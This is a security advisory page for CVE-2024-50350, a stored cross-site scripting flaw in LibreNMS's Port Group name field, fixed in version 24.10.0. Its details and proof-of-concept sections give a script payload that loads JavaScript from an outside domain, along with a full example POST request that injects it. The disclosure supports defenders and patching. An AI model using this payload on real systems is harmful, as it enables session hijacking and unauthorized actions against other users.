CVE-2024-50350: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/app/Http/Controllers/Table/EditPortsController.php
First published: Fri Nov 15 2024(Updated: )
### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the "name" parameter when creating a new Port Group. This vulnerability results in the execution of malicious code when the "Port Settings" page is visited after the affected Port Group is added to a device, potentially compromising user sessions and allowing unauthorized actions. ### Details When creating a new "Port Group," an attacker can inject the following XSS payload into the "name" parameter: ```<script/src=//15.rs></script>``` Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code. The payload triggers when the affected Port Group is added to a device and the "Port Settings" page is reloaded. The vulnerability is due to insufficient sanitization of the "name" parameter. The sink responsible for this issue is: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/app/Http/Controllers/Table/EditPortsController.php#L69 ### PoC 1. Create a new Port Group using the following payload in the "name" parameter: ```name<script/src=//15.rs></script>``` 2. Add the Port Group to a device's port settings. 3. Reload the "Port Settings" page. 4. Observe that the injected script executes. Example Request: ```http POST /port-groups HTTP/1.1 Host: <your_host> Content-Type: application/x-www-form-urlencoded Cookie: <your_cookie> _token=<your_token>&name=name<script/src=//15.rs></script>&desc=descr<script/src=//15.rs></script> ``` ### Impact This vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the "Port Settings" page of a device. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.
Credit: security-advisories@github.com security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| composer/librenms/librenms | <=24.9.1 | 24.10.0 |
| LibreNMS | <24.10.0 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
Frequently Asked Questions
What is the severity of CVE-2024-50350?
CVE-2024-50350 is considered a medium severity vulnerability due to its potential for exploitation through stored XSS.
How do I fix CVE-2024-50350?
To fix CVE-2024-50350, upgrade to Librenms version 24.10.0 or later.
Who is affected by CVE-2024-50350?
CVE-2024-50350 affects authenticated users of Librenms prior to version 24.10.0.
What does CVE-2024-50350 exploit?
CVE-2024-50350 exploits the "name" parameter on the Port Settings page to allow for the injection of arbitrary JavaScript.
Is CVE-2024-50350 a high risk for organizations?
Yes, organizations using affected versions of Librenms should address CVE-2024-50350 quickly to mitigate risks of XSS attacks.
- agent/weakness
- agent/first-publish-date
- agent/title
- agent/type
- agent/description
- agent/event
- agent/references
- agent/author
- collector/mitre-cve
- source/MITRE
- agent/severity
- agent/remedy
- agent/softwarecombine
- collector/github-advisory-latest
- source/GitHub
- alias/GHSA-xh4g-c9p6-5jxg
- alias/CVE-2024-50350
- agent/software-canonical-lookup
- agent/last-modified-date
- agent/trending
- collector/github-advisory
- agent/source
- agent/tags
- collector/nvd-cve
- source/NVD
- agent/software-canonical-lookup-request
- collector/nvd-api
- package-manager/composer
- vendor/librenms
- canonical/librenms